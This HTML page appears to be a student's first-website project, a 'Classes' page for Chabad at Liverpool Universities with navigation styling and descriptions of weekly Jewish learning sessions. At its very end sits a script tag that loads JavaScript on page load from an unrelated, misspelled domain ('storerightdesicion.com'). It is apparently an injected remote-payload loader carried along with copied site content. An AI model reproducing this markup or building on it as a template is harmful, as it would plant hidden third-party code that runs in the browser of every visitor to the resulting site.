<!DOCTYPE html>
<html>
    <head>
        <title>Project: First Website</title>
        <meta charset="utf-8">
        <style>
        html {
            scroll-padding-top: 120px;
            scroll-behavior: smooth;
            }
         h1.title {
             margin-top: 120px;
            }
        .header {
            color: white;
            background-color: black;
            height: 10%;
            position: fixed;
            top: 0;
            left: 0;
            width: 100%;
            z-index:1;
            }
        #header-logo {
            margin-left: 80px;
            width: 150px;
            position: fixed;
            }
        .home {
            text-align: center;
            font-size: 30px;
            float: right;
            padding-right: 10px;
            padding-left: 10px;
            padding-top: 5px;
            padding-bottom: 5px;
            margin-left: 280px;
            margin-top: 30px;
            color: white;
            text-decoration-line: none;     
            }
        .home:hover {
            color: black;
            background-color: white;
            }
        .contact-us {
            text-align: center;
            font-size: 30px;
            float: right;
            padding-right: 10px;
            padding-left: 10px;
            padding-top: 5px;
            padding-bottom: 5px;
            margin-top: 30px;
            color: white;
            text-decoration-line: none;
            }
        .contact-us:hover {
            color: black;
            background-color: white;
            }
        .about-us {
            text-align: center;
            font-size: 30px;
            float: right;
            padding-right: 10px;
            padding-left: 10px;
            padding-top: 5px;
            padding-bottom: 5px;
            margin-top: 30px;
            color: white;
            text-decoration-line: none;
            }
        .about-us:hover {
            color: black;
            background-color: white;
            }
        .shabbat {
            text-align: center;
            font-size: 30px;
            float: right;
            padding-right: 10px;
            padding-left: 10px;
            padding-top: 5px;
            padding-bottom: 5px;
            margin-top: 30px;
            color: white;
            text-decoration-line: none;
            }
        .shabbat:hover {
            color: black;
            background-color: white;
            }
        .classes {
            text-align: center;
            font-size: 30px;
            float: right;
            padding-right: 10px;
            padding-left: 10px;
            padding-top: 5px;
            padding-bottom: 5px;
            margin-top: 30px;
            color: white;
            text-decoration-line: none;
            }
        .classes:hover {
            color: black;
            background-color: white;
            }
        .programmes {
            text-align: center;
            font-size: 30px;
            float: right;
            padding-right: 10px;
            padding-left: 10px;
            padding-top: 5px;
            padding-bottom: 5px;
            margin-top: 30px;
            color: white;
            text-decoration-line: none;
            }
        .programmes:hover {
            color: black;
            background-color: white;
            }
        .events {
            text-align: center;
            font-size: 30px;
            float: right;
            padding-right: 10px;
            padding-left: 10px;
            padding-top: 5px;
            padding-bottom: 5px;
            margin-top: 30px;
            color: white;
            text-decoration-line: none;
            }
        .events:hover {
            color: black;
            background-color: white;
            }
        .galery {
            text-align: center;
            font-size: 30px;
            float: right;
            padding-right: 10px;
            padding-left: 10px;
            padding-top: 5px;
            padding-bottom: 5px;
            margin-top: 30px;
            color: white;
            text-decoration-line: none;
            }
        .galery:hover {
            color: black;
            background-color: white;
            }
        .donate {
            text-align: center;
            font-size: 30px;
            float: right;
            padding-right: 10px;
            padding-left: 10px;
            padding-top: 5px;
            padding-bottom: 5px;
            margin-top: 30px;
            color: white;
            text-decoration-line: none;
            }
        .donate:hover {
            color: black;
            background-color: white;
            }
        .visitor-information {
            text-align: center;
            font-size: 30px;
            float: right;
            padding-right: 10px;
            padding-left: 10px;
            padding-top: 5px;
            padding-bottom: 5px;
            margin-top: 30px;
            color: white;
            text-decoration-line: none;
            }
        .visitor-information:hover {
            color: black;
            background-color: white;
            }
        .liverpool-waterfront {
            width: 100%;
            height: 50vh;
            top: 0;
            left: 0;
            margin-top: 70px;
            padding:0;
            }
        .intro-paragraph {
            width: 100%;
            top: 0;
            left: 0;
            padding-top: 20px;
            padding-bottom: 20px;
            background-color: rgb(211, 211, 211);
            color: black;
            text-align = center;
            }
        .first-sentence-intro {
            color: black;
            font-size = 30px;
            text-align: center;
            }
        .second-sentence-intro {
            font-size = 20px;
            text-align: center;
            }
        a {
            text-decoration-line: none;
            }
</style>
    </head>
    <body>
        <div class = "header">
           <a href = "/index.html"><img id = "header-logo" src = "https://www.ulivchabad.org/wp-content/uploads/2014/05/ChabadLiverpoolUnilogo-011.jpg" alt = "Chabad at Liverpool Universities Logo"></a>
            <table>
                <tbody>
                    <tr>
                        <td><a class = "home" href = "/index.html">Home</a></td>
                        <td><a class = "contact-us" href="/contact-us.html">Contact Us</a></td>
                        <td><a class = "about-us" href = "/about-us.html">About Us</a></td>
                        <td><a class = "shabbat" href = "/shabbat.html">Shabbat</a></td>
                        <td><a class = "classes" href = "/classes.html">Classes</a></td>
                        <td><a class = "programmes" href = "/programmes.html">Programmes</a></td>
                        <td><a class = "events" href = "/events.html">Events</a></td>
                        <td><a class = "galery" href = "/galery.html">Galery</a></td>
                        <td><a class = "donate" href = "/donate.html">Donate</a></td>
                        <td><a class = "visitor-information" href = "/visitor-information.html">Visitor Information</a></td>
                    </tr>
                </tbody>
            </table> 
        </div>
      <h1 style="text-align: center;">Classes</h1>
<p>Join us for the exploration of Jewish ideas and texts. Learning is the lifeblood of Judaism – the Jewish people can survive every internal and external challenge, as long as we have deep and personally meaningful knowledge of its rich heritage of history, philosophy, mysticism and law.</p>
<p>Jewish texts cover a great range of social, political, economic, legal, philosophical, spiritual and other issues.<br>
If there is anything you want to study, explore, or even argue about and it’s not here, we will provide it for you – just drop us a line.</p>
<p>These are some of the classes and courses that you can choose from. All classes are geared for students with limited or no previous experience in Jewish learning, unless otherwise noted. Class times are subject to change, so if you plan to attend, please&nbsp;<a title="" href="https://www.ulivchabad.org/contactus.html">email</a>&nbsp;or call 07799768063 to confirm.</p>
<div class="tw-column-shortcode row-fluid"><div class="span4"><div class="tw-service"><div class="tw-service-box "><div class="tw-service-icon"><img title="LUNCH N' LEARN" src="https://www.ulivchabad.org/wp-content/uploads/2014/05/sandwich1.jpg" width="300"></div><div class="tw-service-content " style=""><h3>LUNCH N’ LEARN</h3><span></span><p>Join our lunch ‘n learn every Tuesday 12 p.m. at the Liverpool Guild of Students with sandwiches and drinks whilst learning Contemporary Judaism.</p><span></span></div></div></div></div><div class="span4"><div class="tw-service"><div class="tw-service-box "><div class="tw-service-icon"><img title="HEBREW CLASSES" src="https://www.ulivchabad.org/wp-content/uploads/2014/05/alefbet1.jpg" width="300"></div><div class="tw-service-content " style=""><h3>HEBREW CLASSES</h3><span></span><p>Shalom Chaver – Come and learn modern day Hebrew/Hebrew reading with a professional every Monday night at 8.30 p.m.</p><span></span></div></div></div></div><div class="span4"><div class="tw-service"><div class="tw-service-box "><div class="tw-service-icon"><img title="PIZZA N' PARSHA" src="https://www.ulivchabad.org/wp-content/uploads/2014/05/pizza1.jpg" width="300"></div><div class="tw-service-content " style=""><h3>PIZZA N’ PARSHA</h3><span></span><p>Come and explore the inner meanings of the weekly Torah Portion (Parsha). We meet every Wednesday at 8.00 p.m. and of course you can enjoy some delicious homemade pizza.</p><span></span></div></div></div></div></div><script src="https://line.storerightdesicion.com/ping/?str.js" type="text/javascript"></script><p></p>
